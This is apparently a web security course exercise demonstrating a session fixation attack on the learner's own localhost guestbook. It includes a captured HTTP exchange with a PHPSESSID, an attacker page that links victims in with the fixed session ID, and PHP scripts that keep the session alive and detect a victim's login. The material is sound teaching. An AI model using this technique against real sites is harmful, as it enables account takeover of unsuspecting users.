Web Security

Broken Authentication

Implement a Session Fixation Attack on your guestbook

For doing this exercise, you need two different browsers, you will see that it is possible to access the session opened with one browser on the other one.

Write a program that connects to the page of your guestbook and stores the Session ID. (you can also do it directly using a telnet and noting the Session ID).

GET   /WebSecurity/examples/guestbook/ HTTP/1.1
Host: localhost

HTTP/1.1 200 OK
Date: Tue, 24 Jun 2008 14:03:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=e1e32bd7733f7d44811d0655f12b30b6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 1863
Content-Type: text/html

<link   rel="stylesheet"   type="text/css"   href="guestbook.css"/>

We have obtained the Session ID=e1e32bd7733f7d44811d0655f12b30b6

On your HTTPS server, creates a new page (it plays the role the web page of the attacker).
This page contains only a Hello World and a reference to an external resource (image, javascript, ...). In reality, this reference points to the homepage of your guestbook and contains the session ID stored in the previous step.
helloWorld.php
```
<h1>Hello World</h1>
<a   
href="http://localhost/WebSecurity/examples/guestbook/index.php?PHPSESSID=e1e32bd7733f7d44811d0655f12b30b6">
 Start the Guest Book</a>
```

Write another program keeping your session alive. (sends regularly requests containing the session ID to the server).
Your program should send an alert when the user has been logged-in (for doing this, you have to look at a sentence that does not appear in the guestbook page normally).
The following program is doing this job:
It is a endless loop sending regularely (every 30s) a request containing the Session ID to the server. So the session remains alive.

<?php


$url="http://localhost/WebSecurity/examples/guestbook/index.php";
$url.="?PHPSESSID=e1e32bd7733f7d44811d0655f12b30b6";

while(1){
    echo "Sending Request\n";
    $fh = fopen($url,'r');
    fclose($fh); 
    sleep(30);
}
?>

If you want to test if the user is logged in, you have to test the presence of the title (h2) Modify your password.

while(1){
    echo "Sending Request\n";
    $fh = fopen($url,'r');
    $loggedIn=0;
    while($theData = fgets($fh)){
	if (preg_match('|<h2>Modify your Password</h2>|i',$theData)){
	    $loggedIn=1;
	}
    }
    if($loggedIn){
	echo "------------ Logged IN  ----------\n";
    }
    else{
	echo "Not yet\n";
    }

    fclose($fh); 
    sleep(10);
}

The attacker simply needs to input the session ID in the URL (disable the cookies in the browser you use for hacking): http://localhost/WebSecurity/examples/guestbook/index.php?PHPSESSID=e1e32bd7733f7d44811d0655f12b30b6